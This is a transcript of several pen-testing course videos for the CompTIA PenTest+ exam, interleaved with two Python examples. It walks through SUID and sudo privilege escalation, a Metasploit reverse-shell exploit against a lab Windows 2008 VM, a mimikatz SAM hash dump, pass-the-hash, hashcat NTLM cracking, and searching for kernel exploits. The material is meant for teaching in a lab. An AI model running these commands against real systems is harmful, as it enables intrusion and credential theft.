so I am going to intentionally tell my Windows machine my Windows Virtual Machine right here which is my Mery exploitable 3 Windows 2008 virtual machine that it's supposed to send HTTP requests to that proxy server which is very common any company use proxy Services proxy servers nowadays but now I am going to see that when I perform a request so I'm going to search for Google Maps and we can see that it's waiting for the response I'm gonna go back to my burp Suite here and we can see that enter The Intercept tab is now
highlighted I'm gonna go there so it says Hey There is a client it's a Windows client that is requesting something okay seems like I cannot find anything special here so I'm going to forward allow this packet to be forwarded okay there it is okay here I can see this search that is being performed the URL requested by that client and it's requesting HTTP here's what matters to me it's the search so that client is searching for Google Maps let's do this Apple Maps and I am going to forward that request and let's see what's going
on there there it is although this user searched for Google Maps we can see that the result is Apple Maps so I changed the content of that transaction so this is a type of interception that we can perform we can change instructions using a dynamic application security testing tool such as burp Suite we could also use OS Plus app so these are some tools that we just saw that are very helpful for us as pen testers in order to analyze whether a client application is specifically web application is secure or not I hope you enjoyed
this video thank you very much hello welcome to module 10 and our focus in this module is going to be host pen testing or host vulnerabilities or exploiting hosts now we've seen how to exploit applications and Network Services we also took a very brief look at exploiting hosts or devices but we didn't treat that topic in depth and that is going to be our goal here most of the concepts involving attacks have already been covered that is actually why we are going to move to a much more Hands-On module this module here will not have
a presentation following slides; the theoretical concepts required to understand host exploitation will be covered as we learn how to use the tools we have available. Always remember that these videos, these modules, are focused on the CompTIA PenTest+ exam, so the tools we're studying and analyzing are tools you might see in your CompTIA PenTest+ exam. When it comes to host exploitation, one of the requirements of the CompTIA PenTest+ exam is to make sure that you understand not only Windows exploitation but also Linux exploitation, for one very specific reason: Linux is an operating system that is very widely used on servers. And when it comes to host exploitation, one of the flaws that you may find as a pen tester concerns permissions. Obviously we're not going to focus on finding or verifying the traditional file permissions, such as read, write and execute, because that is very elementary; however, there are what are called special permissions, or special permission bits, that must be covered. Those are the set-user-ID bit (SUID), the set-group-ID bit (SGID) and the sticky bit. We are not going to thoroughly analyze the sticky bit, for a very basic reason: the only way you can exploit the sticky bit is in the specific situation where a directory should have the sticky bit enabled and it doesn't (on a world-writable directory such as /tmp, the sticky bit is what stops users from deleting or renaming each other's files). In regards to SUID and SGID, there are situations where these bits are supposed to be enabled, but the network admin, or the system admin, must be very much aware of which kinds of tools these special bits can be enabled on and which ones they cannot, or at least shouldn't, be. We are also going to analyze the sudo tool, which nowadays is very widely used, and that's what we're going to start with. So first of all we have to understand the sudo tool and its configuration file, /etc/sudoers. A very
basic concept involving the sudo command is this: let's say that you need one user, a certain number of users, or a group of users to be allowed to execute a specific tool, or a set of commands, as another user, and that other user has permission to execute that tool. For example, regular users can invoke the ifconfig command as long as they are not changing the configuration of a network interface. So a regular user could execute it, and it's not found here, unless we try the full path. There it is: I am a regular user, as you can see that's my user here, kali, and if I use the full path, /sbin/ifconfig, I can execute ifconfig. However, if I try to change the configuration of my network interface, I won't be allowed to, for a very specific reason: I am a regular user, as we can see here; on most systems nowadays regular users have a UID above 999, so starting at 1000. Now, what if I want to allow this user kali to execute a set of tools as the only user that can actually execute those administrative tools, which is the root user? Well, that is actually how Kali Linux and Ubuntu, for example, are configured: when you install these systems you have to create a regular user, but this regular user will be allowed to execute administrative tools as the root user, as long as you use the sudo command. So for example I can do sudo ifconfig. It will ask for my regular user's password, not the administrative password; it's just to make sure: "I want to know if it's you, kali user, that is actually trying to execute this command, or maybe you just left for a coffee and someone came along and is trying to execute an administrative command." So you have to know your own password. I type it in, and there it is, now it works. Observe that I didn't have to use the full path, just the command directly; that is because I'm now invoking it via the sudo command, and sudo searches its own secure_path (which includes /sbin) instead of my user's PATH. Now, what if I want to see whether my user can execute administrative commands using sudo, or whether my user can invoke sudo at all to run any other tool, even if it's not an administrative tool? You can use sudo -l: it will list all the commands you are allowed to execute. So we can see here that, as I mentioned a minute ago, since this is the user I created during the installation, this user will be allowed a lot.
So: user kali may run the following commands on kali (that's also the name of my machine): (ALL : ALL) ALL, meaning I can run all commands, as any user, including the administrator, root. Now, what if I had a user that was allowed to execute, for example, bash, or python, or vi? That doesn't seem to be something dangerous, right? So if I come here to the sudoers file and say that user whatever can execute /bin/bash, well, this doesn't seem dangerous: I'm just allowing a regular user to open a terminal as the administrator. Or I could do the same thing with the vi editor. For example, let's say that I'm a network admin and the company just hired an intern, and although he or she will have a regular, limited user, I want to allow him or her to edit files; however, some of the files that need to be edited must be opened and edited as the administrator, since only the administrator, or another user with some additional permissions, can do it. So I could come here and add /usr/bin/vim, for example, vi improved. That's no big deal, right? At least it seems like there is no big deal here. However, there is, and the problem is this: if I say that this user will execute this tool as, for example, the root user, and this regular user does sudo vim /etc/shadow, which is the password database that stores the users' hashed passwords, well, I'm saying that that user will be allowed to change passwords. Obviously they're hashed, so he or she won't be able to go there and say "I'm going to change this password to this other specific password"; however, first of all I will allow him or her to delete that password hash and leave the account with a blank, empty password, and I will allow him or her to read that file of hashed passwords, and then he or she can use a tool such as John the
Ripper, for example, to try to crack those passwords. So it is very dangerous. (And it's worse than it looks: vim can run a shell command with :!, so sudo vim on any file at all gives the user a root shell, exactly as allowing /bin/bash would.)

Now, that is also why we are going to take a look at the SUID bit. Let's take a look at one file that has the SUID bit enabled: /usr/bin/passwd. Okay, the way that we identify the SUID bit is by looking at the execute permission: instead of x it shows s. Remember that the first three bits identify the permissions for the user, the owner; the next three the group; and the last three others. So we can see here that the s bit is set in the owner's position, therefore it's the SUID bit; if it was shown in the group's position, then we'd see the SGID bit. Okay, now what is going on here? The difference between having the SUID bit and using sudo is that when I configure sudo I'm saying, "I want this user, or these users, or these groups, to execute that tool as this specific user or that specific user." When I enable the SUID bit I'm saying that anyone, any user, will be allowed to execute that command, and it will be executed as the owner of that file. (In this case it could in principle also be a script, but note that Linux ignores the SUID bit on interpreted scripts; it only honours it on binaries.) So first of all, when you use sudo you are specifying the users that will be allowed to execute it; with SUID it doesn't matter who the user is. Also, when you use sudo you're saying, "if these users invoke this command, this is the user that will actually execute that tool"; when I have the SUID bit, it will necessarily be executed as the owner, which is described right here. So when I say that the passwd command has the SUID bit enabled, I'm saying that any user can execute this tool and it will be executed as root. There is a very reasonable explanation for this: for example, the Kali Linux user kali, which is a regular user, should be allowed to change his or her own password; however, to change that password this user must be allowed to edit the /etc/shadow file, because that's what redefining a password does: it changes the record, that data, stored in the shadow database. Okay, the problem with this is that I am actually allowing a user to execute a tool, usually as the root user. So let's take a look at an example right here. First of all, let's see where vi is: it's at /usr/bin/vi, but that is actually a link to /etc/alternatives/vi, which is another link that points to /usr/bin/vim.basic. There it is.
As we can see, there is no SUID bit enabled here. So here's what I'm going to do. With the SUID bit not enabled, if I, as the kali user, try to edit the shadow file: permission denied. I can't even see the content, not to mention overwrite it. Now, I am just assuming that I can execute a tool here as the administrator user, just for presentation purposes: I'm going to use chmod, change mode, to add the SUID permission to /usr/bin/vim.basic (sudo chmod u+s /usr/bin/vim.basic). Let's take a look at the permissions there once again, and we can see that it changed color, and we can also see the SUID bit permission over there. Once again, as the kali user, I am going to edit that same file, and voilà, I can see the content of the shadow file. As I mentioned, the password, which is from here all the way to here, is hashed, but there is plenty of software that, once you get hold of this information, can crack that password, and we are actually going to see that happening. I could also delete this information right here, like that, and although the system tells me "you don't have permission to save this file", I actually do, because I'm root, so I can basically do anything if I force it. Let me do it again and change this one; I think that I deleted more than I was supposed to, but that's fine. So let me edit again, and we can see that it's empty now; yes, I actually deleted it. So you see, it says "no, you can't", but I actually can, there it is, because I'm the administrator and I can do whatever I want.

So, as a pen tester, why is this information so important to you? Obviously, because if you find a command that has the SUID bit enabled, you have to see whether that is actually a tool that is supposed to have SUID enabled or not, because if it's not supposed to, that means you could leverage it and try to gain privileges, for example, or edit files, or change a service, whatever it is, based on that. Okay, that's really nice; however, you have to be able to find those files, and one tool that can help you find them very easily and quickly is the find command. People usually know find because of its numerous combinations of search parameters: you can perform a search saying "I want to find all files with the .txt extension", for example, but you can also search for files based on permissions, based on who owns that file, based on dates (when the file was changed, created or accessed), based on size, so there are a bunch of combinations you can use with find. In this case, we are going to search for files in the entire system, starting the search in the root directory, /, and I'm not going to find files based on name but based on permissions. What is the permission that I want? I want "at least", so that's why I'm going to use a minus sign here, 4000: find / -perm -4000. You already know that the last three digits represent the permissions for owner, group and others. That is if we only consider three digits; however, we actually have four octal digits for permissions. We can omit the most significant one because those are the special bits, but if I want to specify it I can: 4 represents SUID, 2 represents SGID and 1 represents the sticky bit. So if I want to search for files that have SUID, SGID and the sticky bit enabled, I should search for 7000, but that's not what I want; I want to find files with at least the SUID bit enabled. Now look, if I have a file that has SUID and SGID enabled, that's going to be 6, and 6 includes the 4 bit; what I'm saying with -4000 is "at least these bits", which means files with 6 or 7 will also be found and shown. So that would be a basic search; however, I am a regular user and I'm going to see a bunch of output that I don't want to see: "you don't have permission to search in that directory". That's perfectly fine, so I'm going to go back and do it again, redirecting standard error to /dev/null (find / -perm -4000 2>/dev/null), so error messages are discarded. It's searching for those files, and there it is, a bunch of files actually have at least the SUID permission enabled (and look what we have here, vim.basic, because I forgot to remove it). How can I verify that that is actually what I need? find also has the -exec option, which allows us to execute another command on top of each file that is found. So I want, for each file that is found, to execute ls -l; the braces {} will be replaced by the file name that's been found, and \; is the end of my -exec command: find / -perm -4000 -exec ls -l {} \; 2>/dev/null. Performing that search again, there it is: we can see that all these files have at least the SUID permission enabled; this one has SUID and SGID, that's perfectly fine, what matters to me is this. So that is one way of finding those files.

In this video we saw how critical the SUID, SGID and sticky bits are, and we also saw how we can find these types of files, so that as pen testers we can leverage those misconfigurations and try to gather more information. I hope you enjoyed this video, thank you very much.
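The sudo -l and SUID checks from this video (the dangerous sudoers entries for bash and vim, and the find / -perm -4000 search), as an added example in Python that is not the course's own code: it walks a directory tree the way find -perm does, honouring the "at least these bits" semantics of -4000 versus -6000, sorts the set-uid hits into expected, dangerous and unknown, and parses sudo -l rule lines for the same class of shell-escape entries. The baseline list of normally set-uid binaries, the shell-escape list, the sample sudo -l text and the files that run_demo() creates in a throwaway directory are all assumptions constructed for the example (setting the set-uid bit on your own files needs no root, so the demo runs as a regular user).

```python
"""Added example (not from the course): audit set-uid files and sudo -l rules
for the misconfigurations discussed above. Names and lists are assumptions."""
import os
import shutil
import stat
import tempfile

# Assumed baseline of binaries normally set-uid root on a Debian-style system;
# anything set-uid that is not in this list deserves a closer look.
EXPECTED_SUID = {"passwd", "su", "sudo", "mount", "umount", "chsh", "chfn",
                 "newgrp", "gpasswd", "ping", "fusermount"}
# Programs that give a shell or arbitrary file read/write when run as another
# user, whether through sudo or a set-uid bit (the vim.basic case above).
SHELL_ESCAPES = {"bash", "sh", "dash", "zsh", "python", "python3", "perl", "vi",
                 "vim", "vim.basic", "nano", "less", "find", "awk", "env", "tee"}
# Constructed sample of the rule lines `sudo -l` prints for a user.
SAMPLE_SUDO_L = """\
User intern may run the following commands on kali:
    (root) NOPASSWD: /usr/bin/vim, /bin/bash
    (ALL) /usr/sbin/ifconfig
"""

def special_bits(mode):
    """Leading octal digit of the mode: 4 = set-uid, 2 = set-gid, 1 = sticky."""
    return ((4 if mode & stat.S_ISUID else 0) | (2 if mode & stat.S_ISGID else 0)
            | (1 if mode & stat.S_ISVTX else 0))

def find_special(root, want=4):
    """Like `find root -perm -<want>000 2>/dev/null`: a regular file matches
    when every bit in `want` is set, so want=4 also returns modes 6 and 7."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:  # the "permission denied" noise find prints
                continue
            bits = special_bits(st.st_mode)
            if stat.S_ISREG(st.st_mode) and (bits & want) == want:
                hits.append((path, bits))
    return sorted(hits)

def classify_suid(hits):
    """Sort (path, bits) findings into expected, dangerous and unknown."""
    out = {"expected": [], "dangerous": [], "unknown": []}
    for path, _bits in hits:
        name = os.path.basename(path)
        kind = ("dangerous" if name in SHELL_ESCAPES
                else "expected" if name in EXPECTED_SUID else "unknown")
        out[kind].append(path)
    return out

def parse_sudo_l(text):
    """(run-as user, command) pairs from `sudo -l` rule lines such as
    '(root) NOPASSWD: /usr/bin/vim, /bin/bash'; tags like NOPASSWD: are dropped
    and '(ALL : ALL) ALL' yields ('ALL', 'ALL')."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("("):
            continue
        runas, rest = line[1:].split(")", 1)
        for cmd in rest.rsplit(":", 1)[-1].split(","):
            if cmd.strip():
                rules.append((runas.split(":")[0].strip(), cmd.strip()))
    return rules

def dangerous_sudo(rules):
    """Rules that hand over a root shell: ALL, or a known shell-escape program
    (vim drops to a shell with :!sh, bash is a shell already)."""
    return [(runas, cmd) for runas, cmd in rules
            if cmd == "ALL" or os.path.basename(cmd.split()[0]) in SHELL_ESCAPES]

def run_demo():
    """Build a throwaway tree with set-uid/set-gid files (chmod on your own
    files needs no root) and audit it; returns base names for easy checking."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    try:
        for name, mode in {"passwd": 0o4755, "vim.basic": 0o4755,
                           "ping": 0o6755, "notes.txt": 0o644}.items():
            path = os.path.join(root, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")  # constructed placeholder content
            os.chmod(path, mode)
        base = os.path.basename
        hits = find_special(root, 4)
        return {"suid": [(base(p), b) for p, b in hits],
                "suid_and_sgid": [base(p) for p, _ in find_special(root, 6)],
                "classes": {k: [base(p) for p in v]
                            for k, v in classify_suid(hits).items()},
                "sudo_flagged": dangerous_sudo(parse_sudo_l(SAMPLE_SUDO_L))}
    finally:
        shutil.rmtree(root)
```

On a real host you would call find_special("/") and feed the output of sudo -l into parse_sudo_l; the allowlist is the part to tune per distribution, and anything that lands in "unknown" is what a pen tester checks by hand.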
Hello, welcome to our second video of module 10. Continuing what we started in our first video, exploiting hosts, we're now going to focus on Windows hosts, and the reason is that most desktop environments are running Windows. That is actually the ultimate target of attackers, of hackers, because most desktops are running Windows operating systems, in different flavors and versions. So in this video we are going to see two different types of attacks. One is how to capture a file with hashed passwords; we're not going to see it as a file, but that's exactly what it is: it's the SAM database that contains the NT LAN Manager (NTLM) hashes stored by most Microsoft environments. That is going to be one, and we will also see how to crack those hashes. The other one is learning how to exploit the Windows system itself when you already have access to it; that one is a direct and a lot simpler way of gaining privilege. So at the end, what we are going to try to do is escalate privileges; that's our ultimate goal. The difference is that we are going to see two different ways of doing it. The first one is a lot more technical and will give you a range of possibilities in regards to the number of users whose passwords you can retrieve; the other one is simply becoming the administrator by exploiting the operating system itself, not a database or a misconfiguration or anything like that: it's just an operating system that hasn't been patched and updated as it's supposed to be, and you can become the administrator just by knowing that. Okay, so for the first one we need the Metasploit Framework, which is a framework that we've seen in one of our previous videos, and we're actually going to use the same type of attack, which is the reverse shell, or reverse TCP, attack. First of all, I need to make sure that I know my target's IP address and my own IP address as well. You can see that my Kali Linux, which is my attacker machine, has IP address 192.168.0.20, and my Windows machine has IP address 192.168.0.22; this is the Metasploitable 3 virtual machine, the one that runs Windows 2008
Server. Okay, going back to my Kali Linux machine, what I'm going to do now is run the Metasploit Framework, but before we do that you should confirm whether you have a piece of software installed on your Kali system called mimikatz. I have it installed here; in case you don't, make sure you install it before loading msfconsole, before loading the Metasploit Framework, by doing sudo apt-get install mimikatz. I already have it, so what I'm going to do now is run msfconsole. We've done it in a previous video, but let's understand it again and see what is going to happen here. What we're going to do is perform the reverse shell attack, or reverse TCP attack. How does this type of attack work? Basically, you have to find a way of sending a payload to your target; once you're capable of sending that payload to the target, you're going to create a reverse connection, forcing the target to connect back to your machine, and then when you execute a command, that command is sent to that machine. You're going to be able to do that because you'll also become the administrator on that target machine. Now, the way we're going to do this is that on my Microsoft Windows 2008 server we have a central management software, ManageEngine Desktop Central, with a specific vulnerability that we were able to find by using the Nessus vulnerability scanner. So, since I already have mimikatz installed, I am going to search for an author called sinn3r (search author:sinn3r). Now, this guy sinn3r created many, many modules, many exploits for the Metasploit Framework; the one I'm looking for is, if I'm not mistaken, this one, 214. There it is: this is an exploit for a flaw that exists in the ManageEngine Desktop Central tool for versions 9 and below, which is the case here. I'm not going to go back to it because we did it in a previous video, but we saw that we can simply run a Nessus scan and see that this flaw exists in this Windows 2008 server virtual machine. So what I'm going to do now is say I want to use exploit 214 (use 214; that number is only valid for the search I just ran). I could also say use exploit/windows/http/manageengine_connectionid_write, but obviously I don't have to, because I can simply use the number according to the search that I performed. What do I have to do now? I have to look at the options that I have available (show options) in order to know which information I actually need to provide. First of all, Proxies is not required; however, RHOSTS, which stands for remote hosts, is required, because this is my target: that's the variable that will identify my target. So I am going to set RHOSTS to 192.168.0.22. Another one that is also required is the remote port; however, the default RPORT that I have here, 8020, is the actual port I want to attack, the port on which the vulnerable service is running and listening for connections, so I don't have to change that. Also I have to confirm my local information: is my LHOST, 192.168.0.20, correct? Yes. What is the local port I want to listen on? 4444 is perfectly fine; that's the default port for the reverse TCP, reverse shell, payload. And as we can see here, this is an exploit that is targeting ManageEngine Desktop
Central 9 or lower on Windows. Once I have that, all I need to do is run exploit, and we can see that one session has been opened right here. Very good: that connection has been opened, that machine is connecting back to mine. Now I am going to load mimikatz (load mimikatz), for a very specific reason. First of all, what is mimikatz? mimikatz is another framework, with a bunch of tools and resources, for pulling credentials out of Windows systems: it is focused on Windows passwords and all the different types of Windows hashes. So mimikatz has several tools to help us with that, and what I'm willing to do is get hold of NTLM password hashes: mimikatz will show us the hashes. Cracking them is a separate step, and we're going to do it with a different tool, called hashcat. Now, something very important to mention here: there is a well-known technique in Windows environments, PsExec-style remote execution over SMB (Metasploit's exploit/windows/smb/psexec module implements it), that lets us supply the hash itself instead of the password when authenticating; this is called pass-the-hash. That means that once we use mimikatz to see the hashes, I could use that hash with psexec to perform the authentication I want; I wouldn't even have to crack the hash, I wouldn't need the password, in order to authenticate to the system I want. However, this is not our goal: we want to see the password itself, for one very specific reason. Whenever you have a password that is used in a Windows environment, for example in a Windows domain, there is a very high probability that it's also the password that same user account is using for other systems and services. So if you can get hold of the NTLM hash and crack it, you're going to see the password in plain text, which is probably the same password being used for other services, for example to authenticate on the internet, to read emails, and a bunch of other stuff. Now, before we proceed, I want to show you the other type of attack. So far we were able to deploy the reverse shell attack successfully, as we can see, and we can execute sysinfo, for example, and it shows us: I'm taking control of this machine, which
is my Windows 2008 server, running this operating system, and there is a bunch of other information. I can also check the type of account that I have (getuid): I am an admin, and I was only able to become an admin because I executed the getsystem command. getsystem will try to make you the administrator, NT AUTHORITY\SYSTEM, even if you are not currently. So now I am an admin user. Okay, so we were able to successfully implement the reverse shell attack. I will go back to it, but the goal so far is to get hold of the hashed Windows passwords, the NTLM hashes, and try to crack them. Before we go there, though (the reason I'm shifting here is that in order to crack those hashes I'll have to leave msfconsole), while I am in msfconsole I want to show you another resource you have in order to perform another type of attack. At the beginning of this video I mentioned that we're analyzing two attacks: one is cracking the hashes, cracking the passwords; the other one is exploiting the operating system to escalate privilege and become the administrator. This is called a kernel exploit, and kernel exploits exist for every operating system, obviously for all Windows systems as well, and this one is no different. So how can you perform this type of attack? Basically, you have to search for the exploit according to the vulnerability that this kernel, this operating system, gives you. How can you find that type of vulnerability? Well, the Metasploit Framework has a post-exploitation module that will very simply show you what to do: from the Meterpreter session, run post/windows/gather/enum_patches. And there it is. What does it tell me? It tells me that the patch KB976902, which is a critical patch, has not been applied. What to do then? I can simply go to, for example, Exploit-DB and search for KB976902. What am I going to find? A page explaining everything about this vulnerability, and you'll also see the exploit file that you can simply download and run in order to exploit this flaw. The good thing about kernel exploits is that most of them are very simple to exploit: basically you have to download the file, in some situations adjust a few variables, and once you execute it you escalate privilege, usually becoming the administrator. (Keep in mind that a kernel exploit that fails can crash the target, so on a real engagement make sure the rules of engagement allow it.) And this is not a different
one. Okay, now going back to our first type of attack, cracking hashes: well, first we have to see the hashes. Now that we've loaded mimikatz, I am going to use the command mimikatz_command -f samdump::hashes. What is it going to do? It's going to go to the database of hashes; you have to remember that at this moment I have full access to this Windows machine, I am the administrator, I can access any resource, and the SAM is the database that stores the hashed passwords on this system. What I'm doing here is dumping those hashes, and there it is: I can see that I have the Administrator user and its hashed password in NTLM; I also have the Guest user, whose hash is that of an empty password; I have the user vagrant with this hash, the user Leia with that hash, Luke Skywalker this one, Han Solo this one, R2D2 this one. So all user accounts are listed here with their hashed passwords. What do I have to do? I have to copy only the hash or hashes. I am not going to copy the entire content; you can, because it's easier, simply select from here all the way to the end, copy, paste into a file, and then remove whatever is not a hash, such as this. You have to make sure that your file only has hashes. So what am I going to do now? I'm going to quit; now I'm not in the Metasploit Framework anymore. I already did that, and just to make it faster, let's take a look at the hash.txt file that I have here: I just copied a few hashes. What I'm going to do is use a tool called hashcat with these parameters. First of all, hashcat supports different hashing algorithms, and you have to tell hashcat which hash algorithm you have in this file. You can simply do hashcat --help in order to see the help, and it will show you the code for each of the hash algorithms. I know that NTLM is represented by code 1000, so I'm saying that I have this file here called hash.txt and the hashes in it are NTLM: -m 1000. Then I prov

ide the database of possible passwords, the wordlist. Oh, hold on, I forgot the -a 0 here: -a selects the attack mode. 0 is the straight dictionary attack, which hashes each word in the wordlist and compares it, the quick attempt that I want; 3 is the brute-force (mask) attack, which tries every combination and takes much longer. So the command is hashcat -m 1000 -a 0 hash.txt followed by the path to the wordlist. Once it's done, if you haven't cracked that hash in the past, it's going to show you the password it was able to crack; but since, as we can see here, I did it before, that hash has already been cracked and is stored in the potfile. The potfile is in the .hashcat directory in your home, so I'm going to cat ~/.hashcat/hashcat.potfile (hashcat --show with the same -m and hash file prints the same thing), and there it is: these are the passwords that have been cracked using hashcat, one hash:password per line. user1 is from another video that we saw, and this is the hash I have for the Administrator user, which corresponds to vagrant: the Administrator user has the password vagrant. How do I know that this is the password for the Administrator user? Because of the hash: I remember that this is the hash that was shown by mimikatz from msfconsole for the Administrator user. Now again, let's say that you were not able to crack it: you could run the brute-force attack instead, -a 3 with a mask. This would take a much longer time, but it uses more resources in order to crack that hash, or those hashes.

So in this video we saw two types of privilege escalation. You can directly try to do it by identifying kernel vulnerabilities, which is called kernel exploitation, or, in a Windows environment, you can try to find a vulnerability that gives you full access to that machine, and once you have that full access you can dump the SAM database, which stores the NTLM hashes representing the passwords, copy those hashes and use hashcat to crack them. I hope you enjoyed this video, thank you very much.

Hello, welcome to our third video of module 10. In our previous video we saw how to exploit system vulnerabilities, or host vulnerabilities, on Windows systems; now we are going to take a look at a Linux system, and in this case we will focus on kernel exploitation.
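Before moving on, the hash-cracking step from the previous video as an added example in Python, which is not the course's own code: an NT hash is MD4 over the UTF-16LE encoding of the password, so the block implements MD4 itself (many OpenSSL builds no longer expose MD4 through hashlib), pulls the NT hashes out of the pwdump-style lines that samdump::hashes prints, and runs the equivalent of hashcat -m 1000 -a 0 over a wordlist, producing the same hash:password lines that the potfile holds. The dump lines, the user names, the wordlist and the passwords behind the hashes are constructed for the example; the Administrator and Guest hashes are the published NT hashes of "password" and of the empty password.

```python
"""Added example (not from the course): NTLM hashing and a straight dictionary
attack, i.e. what `hashcat -m 1000 -a 0 hash.txt <wordlist>` does, plus the
potfile-style hash:password output. Sample dump and wordlist are constructed."""
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data):
    """RFC 1320 MD4 digest of `data` (bytes) as 16 bytes. Implemented here
    because many OpenSSL builds no longer expose MD4 through hashlib."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    # Padding: 0x80, zeros up to 56 mod 64, then the bit length as LE uint64.
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (function, message-word order, shift cycle, additive constant)
        (F, list(range(16)), (3, 7, 11, 19), 0),
        (G, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15],
         (3, 5, 9, 13), 0x5A827999),
        (H, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15],
         (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        r = state[:]
        for fn, order, shifts, k in rounds:
            for i, word in enumerate(order):
                j = -i % 4  # the register being updated cycles a, d, c, b
                x, y, z = r[(j + 1) % 4], r[(j + 2) % 4], r[(j + 3) % 4]
                r[j] = _rotl((r[j] + fn(x, y, z) + X[word] + k) & MASK,
                             shifts[i % 4])
        state = [(s + t) & MASK for s, t in zip(state, r)]
    return struct.pack("<4I", *state)


def ntlm(password):
    """NT hash: MD4 over the UTF-16LE password, as lower-case hex."""
    return md4(password.encode("utf-16-le")).hex()


def nt_hashes_from_dump(dump):
    """user -> NT hash from pwdump-style lines 'user:rid:lmhash:nthash:::',
    which is the format samdump::hashes / hashdump print."""
    users = {}
    for line in dump.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and len(parts[3]) == 32:
            users[parts[0]] = parts[3].lower()
    return users


def crack_ntlm(hashes, wordlist):
    """Straight dictionary attack (hashcat -a 0): hash each candidate once and
    look it up against all targets at once; returns {hash: password}."""
    targets = {h.lower() for h in hashes}
    found = {}
    for word in wordlist:
        if len(found) == len(targets):
            break
        h = ntlm(word)
        if h in targets and h not in found:
            found[h] = word
    return found


def sample_dump():
    """Constructed dump: Administrator carries the published NT hash of
    'password', Guest the hash of an empty password; the last two hashes are
    generated here so the demo stays self-contained (R2D2's is not in the list)."""
    lm = "aad3b435b51404eeaad3b435b51404ee"  # well-known 'no LM hash' value
    return (
        f"Administrator:500:{lm}:8846f7eaee8fb117ad06bdd830b7586c:::\n"
        f"Guest:501:{lm}:31d6cfe0d16ae931b73c59d7e0c089c0:::\n"
        f"vagrant:1000:{lm}:{ntlm('vagrant')}:::\n"
        f"R2D2:1003:{lm}:{ntlm('Beep-Boop!2187')}:::\n"
    )


def run_demo(wordlist=("123456", "", "vagrant", "password", "letmein")):
    """Dump -> NT hashes -> dictionary attack -> potfile lines (hash:password)."""
    users = nt_hashes_from_dump(sample_dump())
    found = crack_ntlm(users.values(), wordlist)
    cracked = {u: found[h] for u, h in users.items() if h in found}
    return {"cracked": cracked,
            "uncracked": sorted(u for u in users if u not in cracked),
            "potfile": [f"{h}:{pw}" for h, pw in found.items()]}
```

The point to notice is why NTLM cracks so fast: there is no salt and MD4 is cheap, so every candidate is hashed exactly once and compared against every target hash at the same time, which is also why the same hash always maps to the same potfile line and why pass-the-hash works without cracking at all.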
Now, as we saw in the previous video, the good thing about exploiting kernel vulnerabilities is that you can directly gain access as the administrator without putting too much effort into it, because basically what you're doing when you exploit this type of vulnerability is: you somehow found a vulnerability in the kernel, the core of that system, and by leveraging that vulnerability you leave the limited account that you had and you become the administrator. Basically, in order to exploit this type of vulnerability you have to find out whether the kernel that the target system is running has this type of vulnerability or not, and then you simply have to find the exploit, download it, read a few things in order to understand how to use that exploit, and basically run it. Now, one thing that is very important when it comes to kernel exploitation: most of the time it's assumed that you already have access, even if only limited access, to that target machine, and that is what we're going to do here.

So in order to perform this type of attack we need a target Linux machine, and the target machine that I am going to use is Metasploitable 2. The Metasploitable virtual machine that we used in previous videos was Metasploitable 3 with Windows Server 2008; Metasploitable 2 comes with an Ubuntu Linux machine with a bunch of vulnerabilities as well. Now, all those vulnerabilities are not important; the only important thing in this case is finding a Linux system with an outdated kernel. It's also important to realize that, although this seems very obvious, you could think "hey, network admins or security analysts are not going to leave their servers outdated". Well, that's not actually true for Linux servers, because Linux is such a reliable and stable operating system that it's kind of the contrary: Linux admins prefer to keep older kernel versions and just update the software, the services. One of the reasons is that when a kernel is patched the system must be rebooted, and they don't want to reboot the system for many reasons, for example because if the system is rebooted there's going to be downtime, and Linux servers are deployed in order to reduce downtime, preferably not even have any downtime. So it's very common to find Linux servers with kernel 2.6, which is what we're going to see right here.

Okay, so if you want to do the same, search for Metasploitable 2 and download it. It's not a VirtualBox machine, it's a VMware virtual machine, but you can still use VirtualBox to run it. Okay, so here it is, I have my Metasploitable virtual machine right here, and my user is msfadmin. This is a regular user that can run all commands using sudo, but it's not the admin user; it's just a regular user that can invoke sudo to run admin tools. So at first I have limited access to this machine: I have access with a limited user. Now what I need to do is figure out what the operating system is, its version and its kernel. So the first tool that I can run is lsb_release; if it doesn't say anything I can use the -a option. Okay, it's an Ubuntu 8.04. Yep, that's true, this is a very old distribution. Fine, but that doesn't help that much; I actually need to see the version of the kernel, so you can use uname -a, and here it is: it's a 2.6.24-6-server. What matters is 2.6.24 in this case.

Now how do I figure out if there is a kernel exploit, a kernel vulnerability, for this kernel version? I'm going to go to my attacking machine, which is my Kali Linux machine, and there is a tool called searchsploit. Using searchsploit is the same as opening your browser and going to any of those vulnerability search databases or websites, such as the exploit-db website; the only difference is you don't have to go online, you can perform this search locally. And how can you perform this search? The type of vulnerability that I'm trying to find, the exploit that I'm looking for, is a privilege escalation vulnerability, so I'm going to do searchsploit privilege; I have to define the type of exploit that I'm looking for. Now, if I only do this it's going to show a bunch of stuff that's not what I want, so I'm going to apply filters. First of all I want to find privilege escalation for Linux systems, and not anything related to Linux systems but only what is associated with the kernel, so grep kernel, and specifically for kernel versions 2.6. There it is (I forgot the -i). Okay, there is a bunch of vulnerabilities here. Obviously, if you don't want to do any deeper studies, you can simply pick one, "okay, I'm going to use this one", and you download it, you browse, and you read the documentation in order to understand how to use this exploit. Any of these that you see here might work according to your distribution, and that is very important: the distribution that I have as a target is Ubuntu, which means that this one should work, and some others here; this one is specific for CentOS systems, but I am going to try this one. Well, actually this one would not work, or could not work, because it's not associated with kernel 2.6. This one I am certain is associated with Linux kernel 2.6, that's exactly what I'm looking for, and I 